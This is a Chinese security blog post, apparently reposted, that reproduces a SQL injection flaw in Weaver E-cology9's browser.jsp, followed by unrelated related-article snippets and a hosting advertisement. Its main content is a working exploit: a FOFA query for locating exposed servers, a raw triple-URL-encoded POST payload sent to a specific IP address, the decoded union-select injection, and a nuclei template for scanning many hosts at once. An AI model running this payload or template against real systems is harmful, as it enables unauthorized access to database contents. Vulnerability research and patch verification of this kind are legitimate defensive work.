泛微E-cology9 browser.jsp SQL注入漏洞QVD-2023-5012

时间：2023-09-04 16:13:20浏览次数：44

标签：5012 32% QVD 36% 2525% 35% 25% 2023 33%

漏洞简介

泛微e-cology9存在SQL注入漏洞，攻击者可利用该漏洞获取数据库敏感信息。

影响版本

泛微e-cology V9<10.56

漏洞复现

fofa语法：app="泛微-协同商务系统"
登录页面：

POC：

POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: 115.236.39.115:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 649

isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537

keyword参数后面的值是以下语句经过三次url编码后得到的。
a' union select 1,''+(SELECT @@VERSION)+'

nuclei批量yaml文件

id: CNVD-2023-12632

info:
  name: E-Cology V9 - SQL Injection
  author: daffainfo
  severity: high
  description: |
    Ecology9 is a new and efficient collaborative office system created by Panmicro for medium and large organizations. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information.
  reference:
    - https://www.zhihu.com/tardis/zm/art/625931869?source_id=1003
    - https://blog.csdn.net/qq_50854662/article/details/129992329
  metadata:
    max-request: 1
    verified: true
    fofa-query: app="泛微-协同商务系统"
    shodan-query: 'ecology_JSessionid'
  tags: cnvd,cnvd2023,ecology,sqli

# a' union select 1,''+(SELECT md5(9999999))+'
# URL encoded 3 times

http:
  - raw:
      - |
        POST /mobile/plugin/browser.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%33%35%25%32%35%25%33%32%25%33%38%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '283f42764da6dba2522412916b031080'
          - '"autoCount"'
          - '"autoGet"'
        condition: and

      - type: status
        status:
          - 200

标签：5012,32%,QVD,36%,2525%,35%,25%,2023,33%
From： https://www.cnblogs.com/pursue-security/p/17677330.html

泛微E-cology FileDownloadForOutDoc SQL注入漏洞(CVE-2023-15672)
漏洞简介泛微e-cology未对用户的输入进行有效的过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息，进一步利用可能获取目标系统权限等。影响版本Ecology9.x补丁版本<10.58.0；Ecology8.x补丁版本<10.58.0漏洞复现fo......
2023
1mysql的可重复度并没有完全解决虚读幻读问题如果是开启事务后，如果只有简单的select，那么它会触发快照读，为当前事务生成一个readview，后面的简单select也依旧会使用第一次生成的这个readview；如果当前事务中，要是做了update，或者select...forupdate，就会变成当前读，如果执行了upd......
【漏洞复现】Jeecg-Boot 存在前台SQL注入漏洞CVE-2023-1454
一、Jeecg-Boot简介JeecgBoot是一款基于BPM的低代码平台！前后端分离架构SpringBoot2.x，SpringCloud，AntDesign&Vue，Mybatis-plus，Shiro，JWT，支持微服务。强大的代码生成器让前后端代码一键生成，实现低代码开发！JeecgBoot引领新低代码开发模式OnlineCoding->代码生成器->手工MERGE，......
2023牛客多校训练营2
B.LinkwithRailwayCompany最大权闭合子图问题，树链剖分建图求解简述最大权闭合子图：现有一有向图，所有点都有一个权值，你需要选择一个子图，使得子图所有点的出边都指向子图内部，问子图最大权考虑网络流，源点向所有正权点连流量为权值的边，所有负权点向汇点连流量为权值绝对值的边，......
2023年超爆火的15款AI设计软件
随着人工智能技术的快速发展，数字插画之外的“泛设计”行业的从业者也开始在AI中逐渐受益。可能很多设计师还停留在“AI设计软件只能做一些动漫风格插画”的认知中，实际上受到行业需求提升的刺激，软件厂商已经开始积极研究并发布更多针对特定行业和场景的软件产品。接下来的文章中，我们......
领略全球前沿数字创新科技，尽在2023高交会IT展
有人说，现在万物互联的时代背景下我们已经被“屏幕”拴住了眼球；也有人说，现在的我们已经打破了时空地域的壁垒，通过新一代信息技术编织的“信息网”将我们紧密联系在一起。这么看来，人类不自觉地由人工智能技术来掌管自己的身心，并潜移默化地影响着我们每天的行为方式和思维习惯。（2022高......
2023.9.4值得推荐的一款服务器空间
,已经体验一个月咯，非常不错的免费资源，适合大家去了解了解~！他们家的免费空间，免费服务器，非常稳定，非常靠谱，值得拥有，价格厚道~！免备案服务，域名管理等等服务，应有尽有，2023年你值得了解，他们家的免费云服务器还是独立IP的哦，非常非常好，非常NICE~！官网地址：https://www.sanfengyun.com......
uniapp小程序隐私协议弹窗组件。自2023年9月15日起，对于涉及处理用户个人信息的小程序
上代码隐私组件代码直接复制就能用 <template> <viewclass="zero-privacy":class="[{'zero-bottom':position=='bottom'}]"v-if="showPrivacy"> <viewclass="zero-privacy-container":style="{&#......
20230529 java.lang.reflect.InvocationHandler
介绍java.lang.reflect.InvocationHandlerpublicinterfaceInvocationHandlerAPIpublicinvokeinvokeDefault调用接口的default方法......
20230529 java.lang.reflect.AnnotatedElement
介绍java.lang.reflect.AnnotatedElementpublicinterfaceAnnotatedElementAPIisAnnotationPresentgetAnnotationgetAnnotationsgetAnnotationsByTypegetDeclaredAnnotationgetDeclaredAnnotationsByTypegetDeclaredAnnotations......

泛微E-cology9 browser.jsp SQL注入漏洞QVD-2023-5012

漏洞简介

影响版本

漏洞复现

nuclei批量yaml文件

相关文章

赞助商

阅读排行